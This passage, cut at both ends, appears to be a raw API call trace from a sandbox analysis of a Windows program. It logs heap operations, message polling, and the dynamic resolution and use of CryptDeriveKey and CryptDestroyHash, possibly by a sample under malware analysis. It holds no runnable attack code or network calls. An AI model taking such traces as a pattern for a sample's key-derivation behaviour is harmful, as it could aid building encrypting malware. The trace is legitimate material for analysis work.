(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0259.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51bf8 [0259.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51bf8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.653] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.653] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0259.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0259.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0259.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0259.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0259.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0259.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0259.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.658] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0259.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0259.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0259.659] CryptDestroyHash (hHash=0xa87290) returned 1 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.661] PeekMessageW (in: 